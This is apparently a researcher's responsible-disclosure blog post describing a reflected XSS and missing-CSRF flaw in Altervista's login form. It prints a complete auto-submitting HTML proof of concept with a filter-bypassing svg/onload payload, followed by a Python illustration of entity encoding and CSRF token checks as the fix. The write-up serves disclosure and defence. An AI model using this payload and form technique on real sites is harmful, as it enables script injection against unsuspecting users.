Acknowledged by Altervista

I usually don’t write about XSS issues in websites, but since this was a hard hunt I thought I would write a bit about it. The web application handled user input reasonably well, but I did not give up. After some time I figured out that the “target” parameter in the login form was not properly sanitized and that no CSRF tokens were used in the login process. Therefore I was able to build a successful POST-based XSS exploit.

<html>
  <!-- POC by Osanda Malith Jayathissa -->
  <body>
    <form id="exploit" action="http://it.altervista.org/cplogin.php?mode=password" method="POST">
      <input type="hidden" name="Azione" value="Lily" />
      <input type="hidden" name="cookieuser" value="1" />
      <input type="hidden" name="nick" value="Collins" />
      <input type="hidden" name="password" value="Loverhersomuch" />
      <input type="hidden" name="target" value="&apos;&quot;--&gt;&lt;svg/onload=prompt(/XSS_Filter_Bypassed/);&gt;" />
      <script>document.getElementById("exploit").submit(); </script>
    </form>
  </body>
</html>

Once a victim opens the above file, the form is submitted and they are redirected to the login page with our payload. Note that the payload gets executed while the redirect to the next page is in progress. The page also had a weak filter, which was easy to bypass.

[screenshot: pub]

I reported this to the Altervista team and the issue has been resolved by now. As a fix, they now convert the POST parameter to HTML entities.
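To make the before/after concrete, the following is an added example of mine, not Altervista's code or the post's own PoC. It reflects a constructed payload of the same shape as the one above into a hidden input, first verbatim and then HTML-entity-encoded (the fix the post describes), and uses the standard-library tokenizer to show that the encoded version yields a single input element while the raw version yields a second svg element with an onload handler. It also sketches the session-bound CSRF token check that the post notes was missing; the function and field names (issue_login_form, accept_login, the "csrf" field) are assumptions for illustration.

```python
import hmac
import secrets
from html import escape
from html.parser import HTMLParser

# Constructed input mirroring the shape of the PoC payload above: it closes the
# attribute and the element it sits in, then opens a new <svg> with an event handler.
PAYLOAD = "'\"--><svg/onload=prompt(/XSS_Filter_Bypassed/);>"


def render_target_unsafe(target: str) -> str:
    """'Before' behaviour: the parameter is reflected into the page verbatim."""
    return f'<input type="hidden" name="target" value="{target}">'


def render_target_safe(target: str) -> str:
    """'After' behaviour: HTML-entity-encode the value (quote=True also encodes ' and ")."""
    return f'<input type="hidden" name="target" value="{escape(target, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag and its attributes, as a tolerant tokenizer sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def reflected_elements(markup: str) -> list[tuple[str, dict]]:
    """Tokenize markup and return [(tag, attrs), ...]. A second element appearing
    where only the hidden input was expected is the tell-tale sign of a breakout."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def reflected_tag_names(markup: str) -> list[str]:
    """Just the tag names, for a quick check of how many elements the markup produced."""
    return [tag for tag, _ in reflected_elements(markup)]


# --- CSRF side: why an auto-submitting third-party form is accepted at all -----

def issue_login_form(session: dict) -> dict:
    """Server renders the login form and binds a fresh random token to the session
    (hypothetical helper; field names are assumptions)."""
    session["csrf"] = secrets.token_hex(16)
    return {"Azione": "", "nick": "", "password": "", "target": "", "csrf": session["csrf"]}


def accept_login(session: dict, form: dict) -> bool:
    """Reject any POST whose token does not match the one bound to the session.
    A form built on another site cannot know this token, so it is refused."""
    expected = session.get("csrf")
    supplied = form.get("csrf", "")
    return bool(expected) and hmac.compare_digest(expected, supplied)


if __name__ == "__main__":
    print(reflected_tag_names(render_target_unsafe(PAYLOAD)))  # ['input', 'svg']
    print(reflected_tag_names(render_target_safe(PAYLOAD)))    # ['input']
```

Entity-encoding the reflected value is the right fix for an attribute context, but only with the quote characters included; encoding `<` and `>` alone would still let a value that starts with `"` break out of the attribute. The token check is independent of the encoding: it stops the cross-site auto-submit from reaching the vulnerable page in the first place, while the encoding makes the page safe even for requests that do get through.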

[screenshot: fix]

For my responsible disclosure my name got published in the Credits section.

[screenshot: hof]

http://en.altervista.org/credits.php
